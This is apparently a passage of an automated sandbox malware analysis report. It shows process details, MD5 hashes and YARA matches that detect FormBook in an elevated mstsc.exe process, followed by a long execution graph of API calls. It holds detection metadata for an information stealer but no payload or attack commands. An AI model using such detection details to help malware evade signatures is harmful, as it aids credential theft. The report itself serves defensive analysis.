                                            Reputation:moderate

                                            General

                                            Target ID:30
                                            Start time:17:20:02
                                            Start date:13/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff77f440000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:31
                                            Start time:17:20:03
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\mstsc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\mstsc.exe
                                            Imagebase:0x7ff613fd0000
                                            File size:3444224 bytes
                                            MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:0.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:55.9%
                                              Total number of Nodes:1311
                                              Total number of Limit Nodes:62
                                              execution_graph 15581 51b1190 15582 51b11a0 15581->15582 15584 51b11be 15581->15584 15582->15584 15585 51b11e0 15582->15585 15588 51b1204 15585->15588 15586 51fb640 _vswprintf_s 12 API calls 15587 51b1296 15586->15587 15587->15584 15588->15586 14944 5285ba5 14946 5285bb4 __cftof 14944->14946 14945 5285c10 14965 520d130 14945->14965 14946->14945 14952 5285c2a __cftof _vswprintf_s 14946->14952 14955 5284c56 14946->14955 14952->14945 14953 52860cf GetPEB 14952->14953 14954 51f9710 LdrInitializeThunk 14952->14954 14959 51f6de6 14952->14959 14953->14952 14954->14952 14956 5284c62 __cftof 14955->14956 14957 520d130 __cftof 12 API calls 14956->14957 14958 5284caa 14957->14958 14958->14952 14960 51f6e03 14959->14960 14964 51f6e73 14959->14964 14962 51f6e53 14960->14962 14960->14964 14968 51f6ebe 14960->14968 14962->14964 14976 51e6a60 14962->14976 14964->14952 14966 51fb640 _vswprintf_s 12 API calls 14965->14966 14967 520d13a 14966->14967 14967->14967 14981 51ceef0 14968->14981 14971 51f6f0d 14986 51ceb70 14971->14986 14974 51f6f48 14974->14960 14975 51f6eeb 14975->14971 14992 51f7742 14975->14992 14998 52684e0 14975->14998 14977 51e6a8d __cftof 14976->14977 14978 5228025 14976->14978 14977->14978 14979 51fb640 _vswprintf_s 12 API calls 14977->14979 14980 51e6b66 14979->14980 14980->14964 14982 51cef0c 14981->14982 14983 51cef21 14981->14983 14982->14975 14984 51cef29 14983->14984 15004 51cef40 14983->15004 14984->14975 14987 51ceb81 14986->14987 14991 51ceb9e 14986->14991 14989 51cebac 14987->14989 14987->14991 15268 524ff10 14987->15268 14989->14991 15262 51b4dc0 14989->15262 14991->14974 14993 51f7827 14992->14993 14996 51f7768 _vswprintf_s 14992->14996 14993->14975 14995 51ceef0 27 API calls 14995->14996 14996->14993 14996->14995 14997 51ceb70 33 API calls 14996->14997 15335 51f9660 LdrInitializeThunk 14996->15335 14997->14996 14999 5268511 14998->14999 15000 51ceb70 33 API calls 14999->15000 15001 5268556 15000->15001 15002 51ceef0 27 API calls 15001->15002 15003 52685f1 15002->15003 15003->14975 15005 51cf0bd 15004->15005 15008 51cef5d 15004->15008 15005->15008 15042 51b9080 15005->15042 15009 51cf042 15008->15009 15011 51cf071 15008->15011 15012 51b2d8a 15008->15012 15010 51cf053 GetPEB 15009->15010 15009->15011 15010->15011 15011->14982 15013 51b2db8 15012->15013 15029 51b2df1 _vswprintf_s 15012->15029 15014 51b2de7 15013->15014 15013->15029 15048 51b2e9f 15013->15048 15014->15029 15052 51e1624 15014->15052 15016 520f9d0 GetPEB 15018 520f9e3 GetPEB 15016->15018 15018->15029 15022 51b2e5a 15023 51b2e61 15022->15023 15028 51b2e99 _vswprintf_s 15022->15028 15024 51b2e69 15023->15024 15025 51d7d50 GetPEB 15023->15025 15024->15008 15027 520fa76 15025->15027 15031 520fa8a 15027->15031 15032 520fa7a GetPEB 15027->15032 15030 51b2ece 15028->15030 15095 51f95d0 LdrInitializeThunk 15028->15095 15029->15016 15029->15018 15029->15022 15046 51d7d50 GetPEB 15029->15046 15059 524fe87 15029->15059 15066 524fdda 15029->15066 15072 524ffb9 15029->15072 15080 5245720 15029->15080 15030->15008 15031->15024 15034 520fa97 GetPEB 15031->15034 15032->15031 15034->15024 15036 520faaa 15034->15036 15037 51d7d50 GetPEB 15036->15037 15038 520faaf 15037->15038 15039 520fac3 15038->15039 15040 520fab3 GetPEB 15038->15040 15039->15024 15083 5237016 15039->15083 15040->15039 15043 51b9098 15042->15043 15044 51b909e GetPEB 15042->15044 15043->15044 15045 51b90aa 15044->15045 15045->15008 15047 51d7d5d 15046->15047 15047->15029 15049 51b2ebb _vswprintf_s 15048->15049 15050 51b2ece 15049->15050 15096 51f95d0 LdrInitializeThunk 15049->15096 15050->15014 15097 51e16e0 15052->15097 15054 51e1630 15058 51e1691 15054->15058 15101 51e16c7 15054->15101 15057 51e165a 15057->15058 15108 51ea185 15057->15108 15058->15029 15060 51d7d50 GetPEB 15059->15060 15061 524fec1 15060->15061 15062 524fec5 GetPEB 15061->15062 15063 524fed5 _vswprintf_s 15061->15063 15062->15063 15134 51fb640 15063->15134 15065 524fef8 15065->15029 15067 524fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15066->15067 15068 5245720 _vswprintf_s 12 API calls 15067->15068 15069 524fe0f 15068->15069 15070 5245720 _vswprintf_s 12 API calls 15069->15070 15071 524fe39 15070->15071 15071->15029 15073 524ffc8 __cftof 15072->15073 15211 51ee730 15073->15211 15222 51bb171 15080->15222 15084 5237052 15083->15084 15085 5237073 GetPEB 15084->15085 15090 5237084 15084->15090 15085->15090 15086 5237136 15088 51fb640 _vswprintf_s 12 API calls 15086->15088 15087 5237125 GetPEB 15087->15086 15089 5237147 15088->15089 15089->15024 15090->15086 15091 51d7d50 GetPEB 15090->15091 15093 5237101 _vswprintf_s 15090->15093 15092 52370ec 15091->15092 15092->15093 15094 52370f0 GetPEB 15092->15094 15093->15086 15093->15087 15094->15093 15095->15030 15096->15050 15098 51e16ed 15097->15098 15099 51e16f3 GetPEB 15098->15099 15100 51e16f1 15098->15100 15099->15100 15100->15054 15102 51e16da 15101->15102 15103 52255f4 15101->15103 15102->15057 15113 526bbf0 15103->15113 15107 522560a 15109 51ea192 15108->15109 15110 51ea1a0 15108->15110 15109->15058 15110->15109 15111 51ea1b0 GetPEB 15110->15111 15112 51ea1c1 15111->15112 15112->15058 15114 526bc12 15113->15114 15116 52255fb 15114->15116 15121 526c08a 15114->15121 15116->15107 15117 526bf33 15116->15117 15118 526bf4c 15117->15118 15120 526bf97 15118->15120 15129 526be9b 15118->15129 15120->15107 15122 526c0c6 15121->15122 15124 526c104 __cftof 15122->15124 15125 526bfdb 15122->15125 15124->15116 15126 526bfef 15125->15126 15128 526bfeb 15125->15128 15127 526bdfa LdrInitializeThunk 15126->15127 15126->15128 15127->15128 15128->15124 15130 526beb3 15129->15130 15131 526bf08 15130->15131 15133 51f9660 LdrInitializeThunk 15130->15133 15131->15120 15133->15131 15135 51fb64b 15134->15135 15136 51fb648 15134->15136 15139 526b590 15135->15139 15136->15065 15138 51fb74a _vswprintf_s 15138->15065 15142 526b260 15139->15142 15141 526b5a3 15141->15138 15200 520d08c 15142->15200 15144 526b26c GetPEB 15145 526b279 GetPEB 15144->15145 15147 526b293 15145->15147 15148 526b2ba 15147->15148 15149 526b48b 15147->15149 15199 526b54b 15147->15199 15150 526b2c6 15148->15150 15151 526b414 15148->15151 15152 5245720 _vswprintf_s 10 API calls 15149->15152 15155 526b2ce 15150->15155 15166 526b32d 15150->15166 15154 5245720 _vswprintf_s 10 API calls 15151->15154 15153 526b49e 15152->15153 15163 5245720 _vswprintf_s 10 API calls 15153->15163 15156 526b427 15154->15156 15158 526b2f3 15155->15158 15159 526b2da 15155->15159 15164 5245720 _vswprintf_s 10 API calls 15156->15164 15161 5245720 _vswprintf_s 10 API calls 15158->15161 15167 5245720 _vswprintf_s 10 API calls 15159->15167 15160 526b56b _vswprintf_s 15160->15141 15168 526b302 15161->15168 15162 526b2eb 15173 5245720 _vswprintf_s 10 API calls 15162->15173 15169 526b4c2 15163->15169 15171 526b43e 15164->15171 15165 526b396 15170 5245720 _vswprintf_s 10 API calls 15165->15170 15166->15162 15166->15165 15172 526b34d 15166->15172 15167->15162 15174 5245720 _vswprintf_s 10 API calls 15168->15174 15175 526b4cc 15169->15175 15184 526b320 15169->15184 15176 526b3aa 15170->15176 15177 5245720 _vswprintf_s 10 API calls 15171->15177 15178 5245720 _vswprintf_s 10 API calls 15172->15178 15179 526b4fd 15173->15179 15180 526b311 15174->15180 15181 5245720 _vswprintf_s 10 API calls 15175->15181 15182 526b38f 15176->15182 15183 526b3b6 15176->15183 15177->15184 15185 526b361 15178->15185 15186 526b519 15179->15186 15187 5245720 _vswprintf_s 10 API calls 15179->15187 15189 5245720 _vswprintf_s 10 API calls 15180->15189 15181->15162 15195 5245720 _vswprintf_s 10 API calls 15182->15195 15190 5245720 _vswprintf_s 10 API calls 15183->15190 15184->15162 15191 5245720 _vswprintf_s 10 API calls 15184->15191 15185->15182 15192 526b371 15185->15192 15188 5245720 _vswprintf_s 10 API calls 15186->15188 15187->15186 15193 526b528 15188->15193 15189->15184 15194 526b3c5 15190->15194 15191->15162 15196 5245720 _vswprintf_s 10 API calls 15192->15196 15198 5245720 _vswprintf_s 10 API calls 15193->15198 15193->15199 15197 5245720 _vswprintf_s 10 API calls 15194->15197 15195->15162 15196->15162 15197->15162 15198->15199 15199->15160 15201 5240c30 15199->15201 15200->15144 15202 5240c50 15201->15202 15210 5240c49 15201->15210 15203 524193b _vswprintf_s LdrInitializeThunk 15202->15203 15204 5240c5e 15203->15204 15205 5241c76 _vswprintf_s LdrInitializeThunk 15204->15205 15204->15210 15206 5240c70 15205->15206 15207 5240fec _vswprintf_s 12 API calls 15206->15207 15208 5240c91 15207->15208 15209 524193b _vswprintf_s LdrInitializeThunk 15208->15209 15209->15210 15210->15160 15217 51f9670 15211->15217 15219 51f967a 15217->15219 15220 51f968f LdrInitializeThunk 15219->15220 15221 51f9681 15219->15221 15223 51bb180 __cftof 15222->15223 15224 51bb1b0 GetPEB 15223->15224 15227 51bb1c0 __cftof 15223->15227 15224->15227 15225 520d130 __cftof 10 API calls 15226 51bb1de 15225->15226 15226->15029 15229 5214904 GetPEB 15227->15229 15230 51bb1d1 __cftof 15227->15230 15232 51fe2d0 15227->15232 15229->15230 15230->15225 15235 51fe2ed 15232->15235 15234 51fe2e8 15234->15227 15236 51fe30f 15235->15236 15237 51fe2fb 15235->15237 15239 51fe332 15236->15239 15240 51fe31e 15236->15240 15244 51fb58e 15237->15244 15249 5202440 15239->15249 15242 51fb58e __cftof 12 API calls 15240->15242 15243 51fe307 _vswprintf_s 15242->15243 15243->15234 15245 51bb150 __cftof 12 API calls 15244->15245 15246 51fb627 15245->15246 15247 51fb640 _vswprintf_s 12 API calls 15246->15247 15248 51fb632 15247->15248 15248->15243 15250 520249a 15249->15250 15251 52024af 15249->15251 15252 51fb58e __cftof 12 API calls 15250->15252 15253 52024b7 15251->15253 15260 52024cc __aulldvrm _vswprintf_s 15251->15260 15255 52024a4 15252->15255 15254 51fb58e __cftof 12 API calls 15253->15254 15254->15255 15256 51fb640 _vswprintf_s 12 API calls 15255->15256 15257 5202d6e 15256->15257 15257->15243 15258 5202d4f 15259 51fb58e __cftof 12 API calls 15258->15259 15259->15255 15260->15255 15260->15258 15261 52058ee 12 API calls __cftof 15260->15261 15261->15260 15263 51b4dfa 15262->15263 15265 51b4dd1 15262->15265 15264 51b2e9f LdrInitializeThunk 15263->15264 15264->15265 15267 51b4df3 15265->15267 15281 51b4f2e 15265->15281 15267->14991 15334 520d0e8 15268->15334 15270 524ff1c GetPEB 15271 524ff43 GetPEB 15270->15271 15272 524ff2b 15270->15272 15274 524ff6e 15271->15274 15275 524ff4f 15271->15275 15272->15271 15273 524ffb1 15272->15273 15277 520d130 __cftof 12 API calls 15273->15277 15276 51ee730 2 API calls 15274->15276 15278 5245720 _vswprintf_s 12 API calls 15275->15278 15280 524ff7d 15276->15280 15279 524ffb6 15277->15279 15278->15274 15279->14989 15280->14989 15282 5210b85 15281->15282 15287 51b4f3e 15281->15287 15283 5210b8b GetPEB 15282->15283 15284 5210b9a 15282->15284 15283->15284 15285 5210b9f 15283->15285 15290 52888f5 15284->15290 15287->15282 15288 51b4f5b GetPEB 15287->15288 15288->15282 15289 51b4f6e 15288->15289 15289->15267 15291 5288901 __cftof _vswprintf_s 15290->15291 15296 51bcc50 15291->15296 15293 528891f 15294 520d130 __cftof 12 API calls 15293->15294 15295 5288946 15294->15295 15295->15285 15300 51bcc79 15296->15300 15297 51bcc7e 15298 51fb640 _vswprintf_s 12 API calls 15297->15298 15299 51bcc89 15298->15299 15299->15293 15300->15297 15302 51eb230 15300->15302 15303 522a2f6 15302->15303 15304 51eb26a 15302->15304 15304->15303 15305 522a2fd 15304->15305 15310 51eb2ab _vswprintf_s 15304->15310 15306 51eb2b5 15305->15306 15320 5285ba5 15305->15320 15306->15303 15307 51fb640 _vswprintf_s 12 API calls 15306->15307 15308 51eb2d0 15307->15308 15308->15297 15310->15306 15312 51bccc0 15310->15312 15313 51bcd04 15312->15313 15319 51bcd95 15313->15319 15330 51bb150 15313->15330 15316 51bb150 __cftof 12 API calls 15317 5214e14 15316->15317 15318 51bb150 __cftof 12 API calls 15317->15318 15318->15319 15319->15306 15322 5285bb4 __cftof 15320->15322 15321 5285c10 15323 520d130 __cftof 12 API calls 15321->15323 15322->15321 15324 5284c56 12 API calls 15322->15324 15328 5285c2a __cftof _vswprintf_s 15322->15328 15325 52863e5 15323->15325 15324->15328 15325->15306 15327 51f6de6 32 API calls 15327->15328 15328->15321 15328->15327 15329 52860cf GetPEB 15328->15329 15333 51f9710 LdrInitializeThunk 15328->15333 15329->15328 15331 51bb171 __cftof 12 API calls 15330->15331 15332 51bb16e 15331->15332 15332->15316 15333->15328 15334->15270 15335->14996 15589 51e36cc 15590 51e36e6 15589->15590 15591 51e36d4 GetPEB 15589->15591 15592 51e36e5 15591->15592 15593 51b9240 15594 51b924c _vswprintf_s 15593->15594 15595 51b925f 15594->15595 15611 51f95d0 LdrInitializeThunk 15594->15611 15612 51b9335 15595->15612 15599 51b9335 LdrInitializeThunk 15600 51b9276 15599->15600 15617 51f95d0 LdrInitializeThunk 15600->15617 15602 51b927e GetPEB 15603 51d77f0 15602->15603 15604 51b929a GetPEB 15603->15604 15605 51d77f0 15604->15605 15606 51b92b6 GetPEB 15605->15606 15608 51b92d2 15606->15608 15607 51b9330 15608->15607 15609 51b9305 GetPEB 15608->15609 15610 51b931f _vswprintf_s 15609->15610 15611->15595 15618 51f95d0 LdrInitializeThunk 15612->15618 15614 51b9342 15619 51f95d0 LdrInitializeThunk 15614->15619 15616 51b926b 15616->15599 15617->15602 15618->15614 15619->15616 15620 527e539 15641 527bbbb 15620->15641 15622 527e635 15623 527e804 15622->15623 15671 527afde 15622->15671 15624 527e618 15624->15622 15659 527bcd2 15624->15659 15626 527e5f6 15651 527a854 15626->15651 15629 527e567 15629->15622 15629->15624 15629->15626 15647 527a80d 15629->15647 15631 527e68f 15632 527a854 33 API calls 15631->15632 15635 527e6ae 15632->15635 15633 527e614 15633->15624 15633->15631 15634 527a80d 28 API calls 15633->15634 15634->15631 15635->15624 15636 51d7d50 GetPEB 15635->15636 15637 527e7a8 15636->15637 15638 527e7c0 15637->15638 15639 527e7ac GetPEB 15637->15639 15638->15623 15663 526fec0 15638->15663 15639->15638 15642 527bbde 15641->15642 15680 527bd54 15642->15680 15645 527bc3c 15645->15629 15648 527a84e 15647->15648 15649 527a81c 15647->15649 15648->15626 16147 526ff41 15649->16147 15652 527a8c0 15651->15652 15653 527a941 15651->15653 15652->15653 16220 527f021 15652->16220 15655 527aa00 15653->15655 16224 52753d9 15653->16224 15656 51fb640 _vswprintf_s 12 API calls 15655->15656 15658 527aa10 15656->15658 15658->15633 15660 527bceb 15659->15660 16261 527ae44 15660->16261 15664 526fee5 _vswprintf_s 15663->15664 15665 51d7d50 GetPEB 15664->15665 15666 526ff02 15665->15666 15667 526ff06 GetPEB 15666->15667 15668 526ff16 _vswprintf_s 15666->15668 15667->15668 15669 51fb640 _vswprintf_s 12 API calls 15668->15669 15670 526ff3b 15669->15670 15670->15624 15672 527b00a 15671->15672 15673 527b039 15671->15673 15672->15673 15676 527b00e 15672->15676 15677 527b035 15673->15677 16406 51f96e0 LdrInitializeThunk 15673->16406 15675 527b026 15675->15623 15676->15675 16397 527f209 15676->16397 15677->15675 15679 52753d9 33 API calls 15677->15679 15679->15675 15681 527bd63 15680->15681 15682 527bc04 15680->15682 15694 51e4e70 15681->15694 15682->15645 15684 527f9a1 15682->15684 15685 527f9d6 15684->15685 15709 528022c 15685->15709 15687 527f9e1 15688 527f9e7 15687->15688 15689 527fa16 15687->15689 15715 52805ac 15687->15715 15688->15645 15692 527fa1a _vswprintf_s 15689->15692 15731 528070d 15689->15731 15692->15688 15745 5280a13 15692->15745 15695 51e4e94 15694->15695 15699 51e4ec0 15694->15699 15696 51fb640 _vswprintf_s 12 API calls 15695->15696 15697 51e4eac 15696->15697 15697->15682 15699->15695 15700 5268df1 15699->15700 15708 520d0e8 15700->15708 15702 5268dfd GetPEB 15703 5268e10 15702->15703 15704 5245720 _vswprintf_s 12 API calls 15703->15704 15705 5268e2f 15703->15705 15704->15705 15706 520d130 __cftof 12 API calls 15705->15706 15707 5268ebd 15706->15707 15707->15695 15708->15702 15711 5280278 15709->15711 15713 52802c2 15711->15713 15753 5280ea5 15711->15753 15712 52802e9 15712->15687 15713->15712 15780 520cf85 15713->15780 15719 52805d1 15715->15719 15716 52806db 15716->15689 15717 5280652 15718 527a854 33 API calls 15717->15718 15721 5280672 15718->15721 15719->15716 15719->15717 15720 527a80d 28 API calls 15719->15720 15720->15717 15721->15716 15853 5281293 15721->15853 15724 51d7d50 GetPEB 15725 528069c 15724->15725 15726 52806b0 15725->15726 15727 52806a0 GetPEB 15725->15727 15726->15716 15728 52806ba GetPEB 15726->15728 15727->15726 15728->15716 15729 52806c9 15728->15729 15730 527138a 14 API calls 15729->15730 15730->15716 15732 5280734 15731->15732 15733 52807d2 15732->15733 15734 527afde 33 API calls 15732->15734 15733->15692 15735 5280782 15734->15735 15736 5281293 33 API calls 15735->15736 15737 528078e 15736->15737 15738 51d7d50 GetPEB 15737->15738 15739 5280793 15738->15739 15740 52807a7 15739->15740 15741 5280797 GetPEB 15739->15741 15740->15733 15742 52807b1 GetPEB 15740->15742 15741->15740 15742->15733 15743 52807c0 15742->15743 15857 52714fb 15743->15857 15746 5280a3c 15745->15746 15865 5280392 15746->15865 15749 520cf85 33 API calls 15750 5280aec 15749->15750 15751 5280b19 15750->15751 15752 5281074 35 API calls 15750->15752 15751->15688 15752->15751 15784 527ff69 15753->15784 15755 528105b 15757 5281055 15755->15757 15808 5281074 15755->15808 15756 5280f32 15758 527a854 33 API calls 15756->15758 15757->15713 15766 5280f50 15758->15766 15760 5280fab 15764 51d7d50 GetPEB 15760->15764 15761 5280ecb 15761->15755 15761->15756 15762 527a80d 28 API calls 15761->15762 15762->15756 15765 5280fcf 15764->15765 15767 5280fe3 15765->15767 15768 5280fd3 GetPEB 15765->15768 15766->15755 15766->15760 15790 52815b5 15766->15790 15769 5280fed GetPEB 15767->15769 15770 528100e 15767->15770 15768->15767 15769->15770 15772 5280ffc 15769->15772 15771 51d7d50 GetPEB 15770->15771 15773 5281013 15771->15773 15794 527138a 15772->15794 15775 5281027 15773->15775 15776 5281017 GetPEB 15773->15776 15777 5281041 15775->15777 15778 526fec0 14 API calls 15775->15778 15776->15775 15777->15757 15802 52752f8 15777->15802 15778->15777 15782 520cf98 15780->15782 15781 520cfb1 15781->15712 15782->15781 15783 52752f8 33 API calls 15782->15783 15783->15781 15785 527ff9f 15784->15785 15789 527ffd1 15784->15789 15788 527a80d 28 API calls 15785->15788 15785->15789 15786 527a854 33 API calls 15787 527fff1 15786->15787 15787->15761 15788->15789 15789->15786 15791 52815d0 15790->15791 15793 52815d7 15790->15793 15820 528165e 15791->15820 15793->15766 15795 52713af _vswprintf_s 15794->15795 15796 51d7d50 GetPEB 15795->15796 15797 52713d2 15796->15797 15798 52713d6 GetPEB 15797->15798 15799 52713e6 _vswprintf_s 15797->15799 15798->15799 15800 51fb640 _vswprintf_s 12 API calls 15799->15800 15801 527140b 15800->15801 15801->15770 15803 52753c7 15802->15803 15804 5275321 15802->15804 15806 51fb640 _vswprintf_s 12 API calls 15803->15806 15829 5237b9c 15804->15829 15807 52753d5 15806->15807 15807->15757 15809 52810b0 15808->15809 15810 5281095 15808->15810 15811 527afde 33 API calls 15809->15811 15812 528165e LdrInitializeThunk 15810->15812 15813 52810c8 15811->15813 15812->15809 15814 51d7d50 GetPEB 15813->15814 15815 52810cd 15814->15815 15816 52810d1 GetPEB 15815->15816 15818 52810e1 15815->15818 15816->15818 15817 52810fa 15817->15757 15818->15817 15845 526fe3f 15818->15845 15822 528166a _vswprintf_s 15820->15822 15821 5281869 _vswprintf_s 15821->15793 15822->15821 15824 5281d55 15822->15824 15825 5281d61 _vswprintf_s 15824->15825 15826 5281fc5 _vswprintf_s 15825->15826 15828 51f96e0 LdrInitializeThunk 15825->15828 15826->15822 15828->15826 15832 51f1130 15829->15832 15835 51f115f 15832->15835 15836 51f11a8 15835->15836 15838 522cd96 15835->15838 15837 51f11e9 _vswprintf_s 15836->15837 15836->15838 15839 522cd9d 15836->15839 15843 51f12bd 15837->15843 15844 51bccc0 _vswprintf_s 12 API calls 15837->15844 15842 5285ba5 33 API calls 15839->15842 15839->15843 15840 51fb640 _vswprintf_s 12 API calls 15841 51f1159 15840->15841 15841->15803 15842->15843 15843->15838 15843->15840 15844->15843 15846 526fe64 _vswprintf_s 15845->15846 15847 51d7d50 GetPEB 15846->15847 15848 526fe81 15847->15848 15849 526fe85 GetPEB 15848->15849 15850 526fe95 _vswprintf_s 15848->15850 15849->15850 15851 51fb640 _vswprintf_s 12 API calls 15850->15851 15852 526feba 15851->15852 15852->15817 15854 5280697 15853->15854 15855 52812b2 15853->15855 15854->15724 15856 52752f8 33 API calls 15855->15856 15856->15854 15858 5271520 _vswprintf_s 15857->15858 15859 51d7d50 GetPEB 15858->15859 15860 5271543 15859->15860 15861 5271557 _vswprintf_s 15860->15861 15862 5271547 GetPEB 15860->15862 15863 51fb640 _vswprintf_s 12 API calls 15861->15863 15862->15861 15864 527157c 15863->15864 15864->15733 15868 52803a0 15865->15868 15866 5280589 15866->15749 15867 528070d 36 API calls 15867->15868 15868->15866 15868->15867 15870 525da47 15868->15870 15871 525da51 15870->15871 15875 525da9b 15870->15875 15871->15875 15876 51dc4a0 15871->15876 15875->15868 15893 51dc577 15876->15893 15878 51dc4cc 15886 51dc52c 15878->15886 15901 51dc182 15878->15901 15879 51fb640 _vswprintf_s 12 API calls 15880 51dc545 15879->15880 15880->15875 15887 527526e 15880->15887 15882 51dc515 15882->15886 15916 51ddbe9 15882->15916 15883 51dc4f9 15883->15882 15883->15886 15934 51de180 15883->15934 15886->15879 15888 52752a4 15887->15888 15889 527528d 15887->15889 15891 51fb640 _vswprintf_s 12 API calls 15888->15891 15890 5237b9c 33 API calls 15889->15890 15890->15888 15892 52752af 15891->15892 15892->15875 15894 51dc5b5 15893->15894 15898 51dc583 15893->15898 15895 51dc5ce 15894->15895 15896 51dc5bb GetPEB 15894->15896 15897 52888f5 33 API calls 15895->15897 15896->15895 15899 51dc5ad 15896->15899 15897->15899 15898->15894 15900 51dc59e GetPEB 15898->15900 15899->15878 15900->15894 15900->15899 15902 51dc1c4 15901->15902 15903 51dc1a2 15901->15903 15904 51d7d50 GetPEB 15902->15904 15903->15883 15905 51dc1dc 15904->15905 15906 5222d65 GetPEB 15905->15906 15907 51dc1e4 15905->15907 15908 5222d78 15906->15908 15907->15908 15910 51dc1f2 15907->15910 15960 5288d34 15908->15960 15910->15903 15937 51dbb2d 15910->15937 15913 51dbb2d 28 API calls 15914 51dc227 15913->15914 15942 51db944 15914->15942 15917 51ddc05 15916->15917 15927 51ddc54 15917->15927 15990 51b4510 15917->15990 15918 51d7d50 GetPEB 15920 51ddd10 15918->15920 15922 51ddd18 15920->15922 15923 5223aff GetPEB 15920->15923 15925 5223b12 15922->15925 15926 51ddd29 15922->15926 15923->15925 15924 51bcc50 33 API calls 15924->15927 15998 5288ed6 15925->15998 15981 51ddd82 15926->15981 15927->15918 15929 5223b1b 15929->15929 15931 51ddd3b 15932 51db944 17 API calls 15931->15932 15933 51ddd45 15932->15933 15933->15886 15935 51dc577 35 API calls 15934->15935 15936 51de198 15935->15936 15936->15882 15938 51dbb33 15937->15938 15939 527a80d 28 API calls 15938->15939 15941 51dbb92 15938->15941 15940 5222d06 15939->15940 15941->15913 15943 51dbadd 15942->15943 15959 51db980 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15942->15959 15945 51d7d50 GetPEB 15943->15945 15956 51dbab7 15943->15956 15944 51fb640 _vswprintf_s 12 API calls 15946 51dbad9 15944->15946 15947 51dbaee 15945->15947 15946->15903 15948 51dbaf6 15947->15948 15949 5222caf GetPEB 15947->15949 15948->15956 15967 5288cd6 15948->15967 15953 5222cc2 GetPEB 15949->15953 15950 51d7d50 GetPEB 15951 51dbaa1 15950->15951 15951->15953 15954 51dbaa9 15951->15954 15955 5222cd5 15953->15955 15954->15955 15954->15956 15974 5288f6a 15955->15974 15956->15944 15958 5222ce2 15958->15958 15959->15950 15959->15956 15961 51d7d50 GetPEB 15960->15961 15962 5288d5a 15961->15962 15963 5288d5e GetPEB 15962->15963 15964 5288d6e _vswprintf_s 15962->15964 15963->15964 15965 51fb640 _vswprintf_s 12 API calls 15964->15965 15966 5288d91 15965->15966 15966->15903 15968 51d7d50 GetPEB 15967->15968 15969 5288cf9 15968->15969 15970 5288cfd GetPEB 15969->15970 15971 5288d0d _vswprintf_s 15969->15971 15970->15971 15972 51fb640 _vswprintf_s 12 API calls 15971->15972 15973 5288d30 15972->15973 15973->15956 15975 51d7d50 GetPEB 15974->15975 15976 5288f9c 15975->15976 15977 5288fa0 GetPEB 15976->15977 15978 5288fb0 _vswprintf_s 15976->15978 15977->15978 15979 51fb640 _vswprintf_s 12 API calls 15978->15979 15980 5288fd3 15979->15980 15980->15958 15982 51dddbc 15981->15982 15983 51ceef0 27 API calls 15982->15983 15988 51dde19 15982->15988 15984 51dded7 15983->15984 15985 51ddf1f 15984->15985 15986 51ceb70 33 API calls 15984->15986 15985->15931 15987 51ddf0b 15986->15987 15987->15988 16005 51ddf70 15987->16005 15988->15931 15991 51b458f 15990->15991 15992 51b4523 15990->15992 15991->15924 15992->15991 15993 51bb150 __cftof 12 API calls 15992->15993 15994 52108f7 15993->15994 15995 51bb150 __cftof 12 API calls 15994->15995 15996 5210901 15995->15996 15997 51bb150 __cftof 12 API calls 15996->15997 15997->15991 15999 51d7d50 GetPEB 15998->15999 16000 5288f2f 15999->16000 16001 5288f33 GetPEB 16000->16001 16002 5288f43 _vswprintf_s 16000->16002 16001->16002 16003 51fb640 _vswprintf_s 12 API calls 16002->16003 16004 5288f66 16003->16004 16004->15929 16006 51ddf7c _vswprintf_s 16005->16006 16007 51ddfbf 16006->16007 16008 51ddfba 16006->16008 16009 51ddfe5 16006->16009 16046 51de090 16007->16046 16027 51ce510 16008->16027 16013 51de07c 16009->16013 16014 51ddff2 16009->16014 16012 51ddfdf _vswprintf_s 16012->15988 16124 51ef8f2 16013->16124 16016 51ddffb 16014->16016 16017 51de075 16014->16017 16055 51e0075 16016->16055 16110 51e36e9 16017->16110 16020 51de000 16020->16007 16021 5223b30 16020->16021 16023 51de01e 16020->16023 16139 5235510 16021->16139 16023->16007 16083 51bb1e1 16023->16083 16028 51cb02a 20 API calls 16027->16028 16041 51ce57e 16028->16041 16029 51ce8b4 16031 51c8794 63 API calls 16029->16031 16045 51ce8ec 16029->16045 16030 51ce904 16034 51ce90c 16030->16034 16036 51bb1e1 19 API calls 16030->16036 16035 51ce8d0 16031->16035 16032 51f97a0 _vswprintf_s LdrInitializeThunk 16032->16030 16033 51ce95a 16033->16007 16034->16007 16037 51cb02a 20 API calls 16035->16037 16035->16045 16038 521b98c 16036->16038 16037->16045 16039 521b7e9 16040 5235510 12 API calls 16039->16040 16039->16045 16040->16045 16041->16029 16041->16033 16041->16039 16043 51ce783 16041->16043 16044 520cdfa 12 API calls 16041->16044 16041->16045 16042 5235510 12 API calls 16042->16045 16043->16042 16043->16045 16044->16041 16045->16030 16045->16032 16047 5223b90 16046->16047 16048 51de099 16046->16048 16049 51bb1e1 19 API calls 16047->16049 16051 51ceef0 27 API calls 16048->16051 16054 51de0e1 16048->16054 16050 5223ba6 16049->16050 16050->16050 16052 51de0bc 16051->16052 16053 51ceb70 33 API calls 16052->16053 16053->16054 